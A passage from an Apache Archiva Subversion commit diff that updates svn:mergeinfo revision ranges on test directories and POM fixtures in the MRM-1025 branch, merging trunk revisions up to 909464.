/archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/tags/DependencyTreeTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/artifactId/version/artifactId-version.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child1/1.0/child1-1.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child2/1.0/child2-1.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/child3/1.0/child3-1.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild1/2.0/grandchild1-2.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild2/2.0/grandchild2-2.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/grandchild3/2.0/grandchild3-2.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/repositories/test/groupId/great-grandchild/3.0/great-grandchild-3.0.pom:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:825850-909070 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/tags/DependencyTreeTest.xml:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webdav/src/test/java/org/apache/archiva/metadata:686983-687034 